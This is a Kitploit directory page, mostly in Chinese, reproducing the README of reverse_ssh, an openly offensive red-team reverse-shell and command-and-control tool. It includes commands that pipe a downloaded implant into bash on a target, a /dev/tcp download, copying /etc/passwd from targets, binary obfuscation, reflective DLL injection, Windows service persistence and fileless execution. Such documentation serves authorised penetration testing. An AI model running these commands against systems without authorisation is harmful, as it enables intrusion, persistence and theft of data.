Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
reverse_ssh — 基于SSH的反向Shell管理工具,原生支持SCP/SFTP、多种传输协议、Windows DLL生成以及无文件执行,适用于红队行动。 | Kitploit
工具/GitHubGitHub/nhas/reverse_ssh
ShellcodeShellcode 生成
GitHubnhas/reverse_ssh

reverse_ssh

基于SSH的反向Shell管理工具,原生支持SCP/SFTP、多种传输协议、Windows DLL生成以及无文件执行,适用于红队行动。

查看仓库
1.4k1843121天前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
# 反向SSH
![icon](https://assets.kitploit.com/production/public/readmes/5627/3bd0c45d677266412761b05b4295e04dcc933d5a2f68427afa1f06748c3220ac.png)  
(艺术作品致谢 https://www.instagram.com/smart.hedgehog.art/)

想要使用SSH实现反向Shell?现在你可以了。

- 使用原生SSH语法管理和连接反向Shell
- 动态、本地和远程转发
- 原生`SCP`和`SFTP`实现,用于从目标检索文件
- 完整的Windows Shell
- 多种网络传输协议,例如`http`、`websockets`、`tls`等
- 客户端与服务器相互认证,建立高信任控制通道
以及更多!```text
                    +----------------+                 +---------+
                    |                |                 |         |
                    |                |       +---------+   RSSH  |
                    |    Reverse     |       |         |  Client |
                    |  SSH server    |       |         |         |
                    |                |       |         +---------+
+---------+         |                |       |
|         |         |                |       |
| Human   |   SSH   |                |  SSH  |         +---------+
| Client  +-------->+                <-----------------+         |
|         |         |                |       |         |   RSSH  |
+---------+         |                |       |         |  Client |
                    |                |       |         |         |
                    |                |       |         +---------+
                    |                |       |
                    |                |       |
                    +----------------+       |         +---------+
                                             |         |         |
                                             |         |   RSSH  |
                                             +---------+  Client |
                                                       |         |
                                                       +---------+
```
https://github.com/user-attachments/assets/11dc8d14-59f1-4bdd-9503-b70f8a0d2db1

- [反向 SSH](#reverse-ssh)
  - [摘要](#tldr)
    - [设置](#setup)
    - [基本用法](#basic-usage)
  - [赞助者](#sponsors)
    - [个人](#individuals)
    - [公司](#companies)
  - [高级特性](#fancy-features)
    - [权限](#privileges)
    - [自动反向连接](#automatic-connect-back)
    - [反向 Shell 下载(客户端生成与内置 HTTP 服务器)](#reverse-shell-download-client-generation-and-in-built-http-server)
    - [替代传输(HTTP/Websockets/TLS)](#alternate-transports-httpwebsocketstls)
    - [Bash 自动补全](#bash-autocomplete)
    - [Windows DLL 生成](#windows-dll-generation)
    - [SSH 子系统](#ssh-subsystems)
      - [全部](#all)
      - [Linux](#linux)
      - [Windows](#windows)
    - [Windows 服务集成](#windows-service-integration)
    - [完整的 Windows Shell 支持](#full-windows-shell-support)
    - [Webhooks](#webhooks)
    - [Tun (VPN)](#tun-vpn)
    - [无文件执行(客户端支持动态下载可执行文件作为 Shell 执行)](#fileless-execution-clients-support-dynamically-downloading-executables-to-execute-as-shell)
      - [支持的 URI 方案](#supported-uri-schemes)
- [帮助](#help)
  - [Windows](#windows-help)
    - [Windows 与 SFTP](#windows-and-sftp)
    - [会话生成错误 (0xc0000142)](#session-spawn-errors-0xc0000142)
  - [使用 `--insecure` 启动服务器仍有 `Failed to handshake`](#server-started-with---insecure-still-has-failed-to-handshake)
  - [前台与后台](#foreground-vs-background)
- [捐赠、支持或回馈](#donations-support-or-giving-back)

## 摘要

### 设置

建议使用 Docker 版本,因为它包含了正确版本的 Go 语言以及 Windows 的交叉编译器。```sh
# Start the server
docker run -p3232:2222 -e EXTERNAL_ADDRESS=<your.rssh.server.internal>:3232 -e SEED_AUTHORIZED_KEYS="$(cat ~/.ssh/id_ed25519.pub)" -v ./data:/data reversessh/reverse_ssh
```
或者 docker compose:```yaml
services:
  reversessh:
    image: reversessh/reverse_ssh
    ports:
      - "3232:2222"
    environment:
      - EXTERNAL_ADDRESS=<your.rssh.server.internal>:3232
      - RSSH_CONSOLE_LABEL=c2.label
      - RSSH_LOG_LEVEL=INFO # DISABLED, INFO, WARNING, ERROR, FATAL
      - SEED_AUTHORIZED_KEYS=${SSH_PUBLIC_KEY}
    volumes:
      - ./data:/data
```
### 基本用法```sh
# Connect to the server console
ssh your.rssh.server.internal -p 3232


# List all server console commands
catcher$ help

# Build a new client and host it on the in-built webserver
catcher$ link
http://192.168.0.11:3232/4bb55de4d50cc724afbf89cf46f17d25


# curl or wget this binary to a target system then execute it,
curl http://192.168.0.11:3232/4bb55de4d50cc724afbf89cf46f17d25.sh |  bash

# then we can then list what clients are connected
catcher$ ls
                                 Targets
+------------------------------------------+-----------------------------------+
| IDs                                      | Version                           |
+------------------------------------------+-----------------------------------+
| a0baa1631fe7cfbbfae34eb7a66d46c00d2a161e | SSH-v2.2.3-1-gdf5a3f8-linux_amd64 |
| fe6c52029e37185e4c7d512edd67a6c7694e2995 |                                   |
| dummy.machine                            |                                   |
| 192.168.0.11:34542                       |                                   |
+------------------------------------------+-----------------------------------+
```
所有命令都支持 `-h` 标志以显示帮助。

然后典型的 ssh 命令可以工作,只需将你的 rssh 服务器指定为跳板主机。```sh
# Connect to full shell
ssh -J your.rssh.server.internal:3232 dummy.machine

# Start remote forward
ssh -R 1234:localhost:1234 -J your.rssh.server.internal:3232 dummy.machine

# Start dynamic forward
ssh -D 9050 -J your.rssh.server.internal:3232 dummy.machine

# SCP
scp -J your.rssh.server.internal:3232 dummy.machine:/etc/passwd .
```
## Sponsors 

衷心感谢以下人士向 RSSH 项目捐款,使这一切成为可能! 

### Individuals
[chikamobina](https://github.com/chikamobina) 的慷慨捐赠!  
[wrighterase (ctrlzero)](https://github.com/wrighterase) 的拉取请求和捐赠! 

### Companies

[Carapace](https://carapace.nz/) 是一家总部位于新西兰的安全咨询公司,团队人才济济!  
[<img src="https://assets.kitploit.com/production/public/readmes/5627/b077b138b5108d69a3bcb10eea9d5f195914c9fb4653689923b3a10a1ee38a64.png">](https://carapace.nz/)


## 高级功能


### 权限
RSSH 服务器支持非常基本的用户权限,在 `data-directory`/`keys`(由 `--datadir` 指定)文件夹中找到的用户(例如 `data-directory/keys/jim`)将被分配为“用户”,只能看到公开的客户端(在 authorized_controllee_keys 文件中没有 `owners` 标签,或 `owners` 标签为空)或专门分配给他们的客户端,例如 `owners="jim"`。 

可以通过用户使用 `access` 命令共享其拥有的客户端访问权限,或由服务器管理员在运行时更改此设置。默认情况下,`authorized_keys` 文件中找到的任何公钥都将被标记为管理员,以保持向后兼容性。
通过 `access` 命令所做的任何更改在服务器重启后不会保留,需要编辑该特定客户端的 `authorized_controllee_keys` 文件。 

### 自动回调

rssh 客户端允许您嵌入一个回调地址。
默认情况下,`link` 命令会嵌入服务器的外部地址。

如果您(出于某种原因)手动构建二进制文件,可以指定环境变量 `RSSH_HOMESERVER` 将其嵌入客户端:```sh
$ RSSH_HOMESERVER=your.rssh.server.internal:3232 make

# Will connect to your.rssh.server.internal:3232, even though no destination is specified
$ bin/client

# Behaviour is otherwise normal; will connect to the supplied host, e.g example.com:3232
$ bin/client -d example.com:3232
```
### 反向 Shell 下载(客户端生成与内置 HTTP/Raw TCP 服务器)

RSSH 服务器可以构建并托管客户端二进制文件(`link` 命令)。这是构建和提供客户端的推荐方式。
为使该功能正常工作,服务器必须置于项目 `bin/` 文件夹中,因为它需要找到客户端源代码。

默认情况下,`docker` 发行版已正确配置此项,推荐使用。```sh
ssh your.rssh.server.internal -p 3232

catcher$ link -h

link [OPTIONS]
Link will compile a client and serve the resulting binary on a link which is returned.
This requires the web server component has been enabled.
        --fingerprint   Set RSSH server fingerprint will default to server public key
        --garble        Use garble to obfuscate the binary (requires garble to be installed)
        --goarch        Set the target build architecture (default runtime GOARCH)
        --goarm Set the go arm variable (not set by default)
        --goos  Set the target build operating system (default runtime GOOS)
        --http  Use http polling as the underlying transport
        --https Use https polling as the underlying transport
        --log-level     Set default output logging levels, [INFO,WARNING,ERROR,FATAL,DISABLED]
        --lzma  Use lzma compression for smaller binary at the cost of overhead at execution (requires upx flag to be set)
        --name  Set the link download url/filename (default random characters)
        --no-lib-c      Compile client without glibc
        --ntlm-proxy-creds      Set NTLM proxy credentials in format DOMAIN\\USER:PASS
        --owners        Set owners of client, if unset client is public all users. E.g --owners jsmith,ldavidson
        --proxy Set connect proxy address to bake it
        --raw-download  Download over raw TCP, outputs bash downloader rather than http
        --shared-object Generate shared object file
        --sni   When TLS is in use, set a custom SNI for the client to connect with
        --stdio Use stdin and stdout as transport, will disable logging, destination after stdio:// is ignored
        --tls   Use TLS as the underlying transport
        --upx   Use upx to compress the final binary (requires upx to be installed)
        --use-kerberos  Instruct client to try and use kerberos ticket when using a proxy
        --working-directory     Set download/working directory for automatic script (i.e doing curl https://<url>.sh)
        --ws    Use plain http websockets as the underlying transport
        --wss   Use TLS websockets as the underlying transport
        -C      Comment to add as the public key (acts as the name)
        -l      List currently active download links
        -o      Set owners of client, if unset client is public all users. E.g --owners jsmith,ldavidson
        -r      Remove download link
        -s      Set homeserver address, defaults to server --external_address if set, or server listen address if not

# Generate a client and serve it on a named link
catcher$ link --name test
http://your.rssh.server.internal:3232/test
```
然后你可以按如下方式下载:```sh
wget http://your.rssh.server.internal:3232/test
chmod +x test
./test
```
或者你可以使用原始 TCP 下载客户端二进制文件:```sh
bash -c "exec 3<>/dev/tcp/your.rssh.server.internal/3232; echo RAWtest>&3; cat <&3" > test
```
其格式仅为 `RAW` 后跟文件名,例如这里的 `test`,rssh 可以通过 `--raw-download` 自动生成。

RSSH 服务器还支持以 `.sh`、`.py` 和 `.ps1` 结尾的 URL 路径,这些路径会生成一个可以管道输入给解释器的脚本:```sh
curl http://your.rssh.server.internal:3232/test.sh | sh
```
### 备用传输方式(HTTP/Websockets/TLS)
反向SSH服务器和客户端都支持多种传输方式,用于应对深度包检测阻止主机或网络向外发送SSH的情况。
您可以通过在客户端中以URL的形式指定回连方案来手动选择传输方式。

例如```sh
./client -d ws://your.rssh.server:3232
```
或者通过使用 `link` 命令将其内置。```sh
ssh your.rssh.server -p 3232 link --ws --name test
```
### Bash 自动补全

RSSH 服务器具有 `autocomplete` 命令,该命令与 bash 很好地集成,因此您可以在未使用服务器控制台时获得自动补全功能。 
要安装它们,只需执行以下操作:```sh
ssh your.rssh.server.internal -p 3232 autocomplete --shell-completion your.rssh.server.internal:3232
```
这将返回一个自动补全,可以添加到您的 `.zshrc` 或 `.bashrc` 中

例如```sh
_RSSHCLIENTSCOMPLETION()
{
    local cur=${COMP_WORDS[COMP_CWORD]}
    COMPREPLY=( $(compgen -W "$(ssh your.rssh.server.internal -p 3232 autocomplete --clients)" -- $cur) )
}

_RSSHFUNCTIONSCOMPLETIONS()
{
    local cur=${COMP_WORDS[COMP_CWORD]}
    COMPREPLY=( $(compgen -W "$(ssh your.rssh.server.internal -p 3232 help -l)" -- $cur) )
}

complete -F _RSSHFUNCTIONSCOMPLETIONS ssh your.rssh.server.internal -p 3232 

complete -F _RSSHCLIENTSCOMPLETION ssh -J your.rssh.server.internal:3232

complete -F _RSSHCLIENTSCOMPLETION ssh your.rssh.server.internal:3232 exec 
complete -F _RSSHCLIENTSCOMPLETION ssh your.rssh.server.internal:3232 connect 
complete -F _RSSHCLIENTSCOMPLETION ssh your.rssh.server.internal:3232 listen -c 
complete -F _RSSHCLIENTSCOMPLETION ssh your.rssh.server.internal:3232 kill 
```
使您可以直接从终端进行补全。```sh
# Will give you an option based on what clients are connected
ssh -J your.rssh.server.internal:3232 <TAB>
```
### Windows DLL 生成

你可以将客户端编译为 DLL,以便通过类似 [Invoke-ReflectivePEInjection](https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-ReflectivePEInjection.ps1) 的方式加载。当你想对 rssh 客户端进行无文件注入时,这会非常有用。

如果你在 Linux 上执行此操作,则需要交叉编译器,使用 `mingw-w64-gcc`,该编译器已包含在 Docker 发布版中。```bash
# Using the link command
catcher$ link --goos windows --shared-object --name windows_dll
http://your.rssh.server.internal:3232/windows_dll

# If building manually
CC=x86_64-w64-mingw32-gcc GOOS=windows RSSH_HOMESERVER=192.168.1.1:2343 make client_dll
```
### SSH 子系统

SSH 协议支持通过 `-s` 标志调用子系统。在 RSSH 中,这被重新用于为平台提供特殊命令以及 `sftp` 支持。

#### 全部

`list`  列出可用的子系统

`sftp`: 运行 sftp 处理器以传输文件

#### Linux

`setgid`:  尝试更改组

`setuid`:  尝试更改用户

#### Windows

`service`: 安装或删除 rssh 二进制文件作为 Windows 服务,需要管理员权限

例如```sh
# Install the rssh binary as a service (windows only)
ssh -J your.rssh.server.internal:3232 test-pc.user.test-pc -s service --install
```
### Windows 服务集成

客户端 RSSH 二进制文件支持在 Windows 服务中运行,并且不会在 10 秒后超时。这对于创建持久管理服务非常有用。

### 完整的 Windows Shell 支持

大多数针对 Windows 的反弹 shell 难以生成一个支持调整大小、复制粘贴以及我们非常喜欢的所有其他功能的 shell 环境。
该项目在新版 Windows 上使用 `conpty`,在旧版 Windows 上使用 `winpty` 库(可自行解压)。这意味着几乎所有的 Windows 版本都能提供一个不错的 shell。

### Webhooks

RSSH 服务器可以发送通过终端界面的 `webhook` 命令设置的原始 HTTP 请求。

首先启用一个 webhook:```bash
$ ssh your.rssh.server.internal -p 3232
catcher$ webhook --on http://localhost:8080/
```
然后断开连接,或连接一个客户端,这将发出以下格式的 `POST` 请求。```bash
$ nc -l -p 8080
POST /rssh_webhook HTTP/1.1
Host: localhost:8080
User-Agent: Go-http-client/1.1
Content-Length: 165
Content-Type: application/json
Accept-Encoding: gzip

{"Status":"connected","ID":"ae92b6535a30566cbae122ebb2a5e754dd58f0ca","IP":"[::1]:52608","HostName":"user.computer","Timestamp":"2022-06-12T12:23:40.626775318+12:00"}%
```
此外,请注意,如果将此连接到 Discord,请使用 `/slack` 端点。

### Tun (VPN)

RSSH 和 SSH 支持创建 tuntap 接口,让你能够路由流量并创建伪 VPN。它的设置比本地或远程转发(`-L`、`-R`)稍微复杂一些,但在这种模式下,你可以发送 `UDP` 和 `ICMP`。

#### 重要提示

如果你连接到恶意的 RSSH 客户端,它可以回连到你的隧道设备。因此,重要的是不要启用转发,并要有防火墙规则来阻止对本地机器的任何连接,或者从容器/netns 内运行它。

在远程机器上安装客户端,如果你的 RSSH 客户端与你的 tun 设备在同一主机上,这将无法工作。```sh
sudo ssh -J your.rssh.server.internal:3232 user.wombo -w 0:any

sudo ip link set dev tun0 up
sudo ip route add 0.0.0.0/0 dev tun0
```
这有一些限制,它只能发送 `UDP`/`TCP`/`ICMP`,而不能发送任意第三层协议。`ICMP` 是尽力而为的,可能会使用远程主机的 `ping` 工具,因为在大多数机器上 ICMP 套接字需要特权。这也不支持 `tap` 设备,例如第二层 VPN,因为这需要管理权限。

### 无文件执行(客户端支持动态下载可执行文件以作为 shell 执行)

当指定 rssh 二进制文件应运行的可执行文件时,无论是连接完整的 PTY 会话还是原始执行,客户端都支持 URI 方案来下载外部可执行文件。

例如。```sh
connect --shell https://your.host/program <rssh_client_id>
ssh -J your.rssh.server:3232 <rssh_client_id> https://your.host/program
```
#### 支持的 URI 方案

`http/https`:纯网络下载

`rssh`:通过 rssh 服务器下载

rssh 服务器将提供可执行文件工作目录中 `downloads` 目录内的内容。

这两种方法都会适时地使用 [memfd](https://man7.org/linux/man-pages/man2/memfd_create.2.html),这不会将任何可执行文件写入磁盘。

# 帮助

## Windows

### SFTP

由于 SFTP(更确切地说是我所使用的库)的限制,在 Windows 上路径需要更多的处理。```sh
sftp -r -J your.rssh.server.internal:3232 test-pc.user.test-pc:'/C:/Windows/system32'
```
## Session spawn errors (0xc0000142)

在某些执行情况下,连接到 Windows 上的 RSSH 客户端可能会失败且不显示错误。```sh
catcher$ connect windows-system
Session has terminated.
```
客户端日志:```sh
2025/08/24 18:25:39 [client] INFO session.go:52 func16() : Session got request: "shell"
2025/08/24 18:25:39 [client] INFO shell_windows.go:137 runWithConpty() : New process with pid 3427 spawned
2025/08/24 18:25:39 [client] INFO session.go:122 func16() : Session disconnected
```
这个问题通常有两种常见原因:一是杀毒软件杀死了生成的 PowerShell 进程,二是 `0xc0000142` 表示生成的进程没有访问 Windows 工作站或桌面的权限 [来源](https://stackoverflow.com/questions/677874/starting-a-process-with-credentials-from-a-windows-service/30687230#30687230)。

要确定是哪种原因导致的问题,请在不使用 pty 的情况下执行任意命令:```sh
ssh -J rssh windows-system cmd /c dir                                
exit status 0xc0000142
```
如果你看到 `0xc0000142` 错误代码,尝试启动 `CMD.exe` 并强制分配一个 pty(`-t`):```sh
ssh -t -J rssh windows-system CMD.exe
```
这应该启动一个交互式外壳。

## 使用 `--insecure` 启动的服务器仍然显示 `Failed to handshake`

如果客户端二进制文件是通过 `link` 命令生成的,那么该客户端默认会嵌入服务器公钥指纹。如果你丢失了服务器私钥,客户端将无法再连接。
你也可以使用 `link --fingerprint <fingerprint here>` 来生成指定指纹的客户端,但截至版本 1.0.13,还没有办法禁用此功能。

## 前台运行 vs 后台运行

默认情况下,客户端会在后台运行,然后父进程退出,子进程将继承父进程的 stdout/stderr,因此你仍然可以看到输出。如果需要调试客户端,请使用 `--foreground` 标志。

# 捐赠、支持或回馈

回馈 RSSH 项目最简单的方式是发现 Bug、提出功能需求,以及向你认为会用到它的人口碑宣传!

当然,如果你想直接向我表达支持,可以通过 Ko-fi 或 GitHub Sponsors(右侧的“Sponsor this Project”)。
也可以通过以下钱包向我捐赠:

Monero (XMR):
`8A8TRqsBKpMMabvt5RxMhCFWcuCSZqGV5L849XQndZB4bcbgkenH8KWJUXinYbF6ySGBznLsunrd1WA8YNPiejGp3FFfPND`
Bitcoin (BTC):
`bc1qm9e9sfrm7l7tnq982nrm6khnsfdlay07h0dxfr`
下载工具